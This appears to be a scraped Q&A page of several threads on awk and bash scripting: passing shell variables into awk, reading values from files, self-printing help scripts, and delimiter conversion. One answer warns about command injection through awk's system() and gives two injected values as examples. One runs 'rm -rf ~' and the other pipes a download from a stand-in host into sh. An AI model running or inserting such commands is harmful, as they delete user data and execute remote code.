awk: using bash variable inside the awk script - bash

The following bash code incorporates the awk code to fuse file1 and file2 in the special fashion, detecting some blocks in the file2 and inserting there all strings from the file1.
#!/bin/bash
# v 0.09 beta
file1=/usr/data/temp/data1.pdb
file2=/usr/data/temp/data2.pdb
# merge the both
awk -v file="${file1}" '/^ENDMDL$/ {system("cat file");}; {print}' "${results}"/"${file2} >> output.pdb
The problem that I can not use in the awk part the variable "file", which relates to the file1 defined in bash
{system("cat file");}
othervise if I past here the full path of the file1 it works well
{system("cat /usr/data/temp/data1.pdb");}
how I could fix my awk code to be able using directly a bash variable there?

The Literal (But Evil, Insecure) Answer
To answer your literal question:
awk -v insecure="filename" 'BEGIN { system("cat " insecure) }'
...will run cat filename.
But if someone passed insecure="filename; rm -rf ~" or insecure='$(curl http://evil.co | sh)', you'd have a very bad day.
The Right Answer
Pass the filename on awk's command line, and check FNR to see if you're reading the first file or a subsequent one.

Use GNU Awk's readfile library:
gawk -i readfile -v file1="$file1" 'BEGIN { file1_data = readfile(file1) }
/^ENDMDL$/ { printf "%s", file1_data } 1' ...
Alternative you can use a while ((getline < file1) > 1) loop to fetch the data.

This is easier with sed
$ sed '/^ENDMDL$/r file1' file2
inserts file1 after the marker.
to replace the marker line with the file1 contents
$ sed -e '/^ENDMDL$/{r file1' -e 'd}' file2

Related

Using a value from stored in a different file awk

I have a value stored in a file named cutoff1
If I cat cutoff1 it will look like
0.34722
I want to use the value stored in cutoff1 inside an awk script. Something like following
awk '{ if ($1 >= 'cat cutoff1' print $1 }' hist1.dat >hist_oc1.dat
I think I am making some mistakes. If I do manually it will look like
awk '{ if ($1 >= 0.34722) print $1 }' hist1.dat >hist_oc1.dat
How can I use the value stored in cutoff1 file inside the above mentioned awk script?
The easiest ways to achieve this are
awk -v cutoff="$(cat cutoff1)" '($1 >= cutoff){print $1}' hist.dat
awk -v cutoff="$(< cutoff1)" '($1 >= cutoff){print $1}' hist.dat
or
awk '(NR==FNR){cutoff=$1;next}($1 >= cutoff){print $1}' cutoff1 hist.dat
or
awk '($1 >= cutoff){print $1}' cutoff="$(cat cutoff1)" hist.dat
awk '($1 >= cutoff){print $1}' cutoff="$(< cutoff1)" hist.dat
note: thanks to Glenn Jackman to point to :
man bash Command substitution: Bash performs the expansion by executing command and replacing the command substitution with the
standard output of the command, with any trailing newlines deleted.
Embedded newlines are not deleted, but they may be removed during word
splitting. The command substitution $(cat file) can be replaced by
the equivalent but faster $(< file).
since awk can read multiple files just add the filename before your data file and treat first line specially. No need for external variable declaration.
awk 'NR==1{cutoff=$1; next} $1>=cutoff{print $1}' cutoff data
PS Just noticed that it's similar to the #kvantour's second answer, but keepin it here as a different flavor.
You could use getline to read a value from another file at your convenience. First the main file to process:
$ cat > file
wait
wait
did you see that
nothing more to see here
And cutoff:
$ cat cutoff
0.34722
An wwk script that reads a line from cutoff when it meets the string see in a record:
$ awk '/see/{if((getline val < "cutoff") > 0) print val}1' file
wait
wait
0.34722
did you see that
nothing more to see here
Explained:
$ awk '
/see/ { # when string see is in the line
if((getline val < "cutoff") > 0) # read a value from cutoff if there are any available
print val # and output the value from cutoff
}1' file # output records from file
As there was only one value, it was printed only once even see was seen twice.

How to write a bash script that dumps itself out to stdout (for use as a help file)?

Sometimes I want a bash script that's mostly a help file. There are probably better ways to do things, but sometimes I want to just have a file called "awk_help" that I run, and it dumps my awk notes to the terminal.
How can I do this easily?
Another idea, use #!/bin/cat -- this will literally answer the title of your question since the shebang line will be displayed as well.
Turns out it can be done as pretty much a one liner, thanks to #CharlesDuffy for the suggestions!
Just put the following at the top of the file, and you're done
cat "$BASH_SOURCE" | grep -v EZREMOVEHEADER
So for my awk_help example, it'd be:
cat "$BASH_SOURCE" | grep -v EZREMOVEHEADER
# Basic form of all awk commands
awk search pattern { program actions }
# advanced awk
awk 'BEGIN {init} search1 {actions} search2 {actions} END { final actions }' file
# awk boolean example for matching "(me OR you) OR (john AND ! doe)"
awk '( /me|you/ ) || (/john/ && ! /doe/ )' /path/to/file
# awk - print # of lines in file
awk 'END {print NR,"coins"}' coins.txt
# Sum up gold ounces in column 2, and find out value at $425/ounce
awk '/gold/ {ounces += $2} END {print "value = $" 425*ounces}' coins.txt
# Print the last column of each line in a file, using a comma (instead of space) as a field separator:
awk -F ',' '{print $NF}' filename
# Sum the values in the first column and pretty-print the values and then the total:
awk '{s+=$1; print $1} END {print "--------"; print s}' filename
# functions available
length($0) > 72, toupper,tolower
# count the # of times the word PASSED shows up in the file /tmp/out
cat /tmp/out | awk 'BEGIN {X=0} /PASSED/{X+=1; print $1 X}'
# awk regex operators
https://www.gnu.org/software/gawk/manual/html_node/Regexp-Operators.html
I found another solution that works on Mac/Linux and works exactly as one would hope.
Just use the following as your "shebang" line, and it'll output everything from line 2 on down:
test.sh
#!/usr/bin/tail -n+2
hi there
how are you
Running this gives you what you'd expect:
$ ./test.sh
hi there
how are you
and another possible solution - just use less, and that way your file will open in searchable gui
#!/usr/bin/less
and this way you can grep if for something too, e.g.
$ ./test.sh | grep something

awk load one file into array, test against another file

I have two files:
seqs.fa:
>seq000007;size=72768;
ACTGTGAG
>seq000010;size=53132;
GTAAGATC
GAATTCTT
>seq00045;size=40321;
ACCCATTT
...
numbers.txt
72768
53132
my desired output would be the lines from the first file that match a number from the second file:
>seq000007;size=72768;
>seq000010;size=53132;
I attempted to use awk, but it only returns lines matching the first number:
awk -F"\n" -v RS=">" 'NR==FNR{for(i=1;i<=NF;i++) A[$i]; next} END {for (header in A) {if ( match(header,$1) ) {print header}}}' seqs.fa numbers.txt
seq000007;size=72768;
seq072768;size=1;
Why is awk only looping through the "header" array for the first line in numbers.txt? And, if this is an XY problem, is there a better way to accomplish this goal?
after fixing the typo in your numbers file
$ awk -F'=|;' 'NR==FNR{a[$1]; next}; $3 in a' numbers.txt seqs.fa
>seq000007;size=72768;
>seq000010;size=53132;
In this special case you can use GNU grep like this:
grep -F -f numbers.txt seqs.fa
The option -f filename uses all the patterns found in filename for the search. The options -F tells grep, that the patterns are simple fixed strings.

Shell: Subsitute a string between 2 Known strings

I wish to replace the contents of new_version varaiable (13.2.0/8) in between abc_def_APP and application1.war strings in file1
Script :
#!/bin/ksh
new_version="13.0.5/8"
old_version=($(grep -r "location=.*application1.war" /path/file1| awk '{print ($1)}'| cut -f8- -d"/"|sed 's/.\{1\}$//'))
echo "$old_version" 'This gives me version number from file1 which needs to be replaced(13.2.0/9)
File1 Contents:
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"
Use following sed command to have your replacement:
sed -i.bak -r "s#^(.*/abc_def_APP/).*(/application1\.war.*)#\1$version1/$version2\2#" /path/file1
With GNU awk (for gensub()):
$ cat file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/9/application1.war"
$ new_version="13.2.0/8"
$ gawk -v nv="$new_version" '{$0=gensub(/^(location.*abc_def_APP\/).*(\/application1.war.*)/,"\\1" nv "\\2","")}1' file
location="cc://view/blah/blah/blah/abc_def_APP/13.2.0/8/application1.war"
The difference between this and a sed solution is that awk doesn't require you to jump through hoops due to your new_version variable containing a "/" (or any other character).

Explode to Array

I put together this shell script to do two things:
Change the delimiters in a data file ('::' to ',' in this case)
Select the columns and I want and append them to a new file
It works but I want a better way to do this. I specifically want to find an alternative method for exploding each line into an array. Using command line arguments doesn't seem like the way to go. ANY COMMENTS ARE WELCOME.
# Takes :: separated file as 1st parameters
SOURCE=$1
# create csv target file
TARGET=${SOURCE/dat/csv}
touch $TARGET
echo #userId,itemId > $TARGET
IFS=","
while read LINE
do
# Replaces all matches of :: with a ,
CSV_LINE=${LINE//::/,}
set -- $CSV_LINE
echo "$1,$2" >> $TARGET
done < $SOURCE
Instead of set, you can use an array:
arr=($CSV_LINE)
echo "${arr[0]},${arr[1]}"
The following would print columns 1 and 2 from infile.dat. Replace with
a comma-separated list of the numbered columns you do want.
awk 'BEGIN { IFS='::'; OFS=","; } { print $1, $2 }' infile.dat > infile.csv
Perl probably has a 1 liner to do it.
Awk can probably do it easily too.
My first reaction is a combination of awk and sed:
Sed to convert the delimiters
Awk to process specific columns
cat inputfile | sed -e 's/::/,/g' | awk -F, '{print $1, $2}'
# Or to avoid a UUOC award (and prolong the life of your keyboard by 3 characters
sed -e 's/::/,/g' inputfile | awk -F, '{print $1, $2}'
awk is indeed the right tool for the job here, it's a simple one-liner.
$ cat test.in
a::b::c
d::e::f
g::h::i
$ awk -F:: -v OFS=, '{$1=$1;print;print $2,$3 >> "altfile"}' test.in
a,b,c
d,e,f
g,h,i
$ cat altfile
b,c
e,f
h,i
$

Resources